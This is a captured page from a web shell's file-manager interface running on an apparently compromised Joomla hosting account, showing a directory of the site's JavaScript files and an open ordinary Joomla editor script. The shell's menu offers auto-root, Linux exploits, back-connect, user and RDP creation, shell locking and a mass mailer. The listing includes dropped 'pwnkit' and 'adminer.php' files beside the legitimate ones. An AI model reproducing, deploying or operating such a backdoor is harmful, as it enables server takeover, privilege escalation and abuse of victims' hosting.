Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
www /
media /
com_content /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
admin-article-pagebreak.js
1.2
KB
-rw-r--r--
admin-article-pagebreak.min.js
621
B
-rw-r--r--
admin-article-readmore.js
1.13
KB
-rw-r--r--
admin-article-readmore.min.js
693
B
-rw-r--r--
admin-articles-modal.js
2.17
KB
-rw-r--r--
admin-articles-modal.min.js
1.18
KB
-rw-r--r--
adminer.php
0
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : admin-article-readmore.js
/** * @copyright Copyright (C) 2005 - 2019 Open Source Matters, Inc. All rights reserved. * @license GNU General Public License version 2 or later; see LICENSE.txt */ window.insertReadmore = function(editor) { "use strict"; if (!Joomla.getOptions('xtd-readmore')) { // Something went wrong! return false; } var content, options = window.Joomla.getOptions('xtd-readmore'); if (window.Joomla && window.Joomla.editors && window.Joomla.editors.instances && window.Joomla.editors.instances.hasOwnProperty(editor)) { content = window.Joomla.editors.instances[editor].getValue(); } else { content = (new Function('return ' + options.editor))(); } if (content.match(/<hr\s+id=("|')system-readmore("|')\s*\/*>/i)) { alert(options.exists); return false; } else { /** Use the API, if editor supports it **/ if (window.Joomla && window.Joomla.editors && window.Joomla.editors.instances && window.Joomla.editors.instances.hasOwnProperty(editor)) { window.Joomla.editors.instances[editor].replaceSelection('<hr id="system-readmore" />'); } else { window.jInsertEditorText('<hr id="system-readmore" />', editor); } } };
Close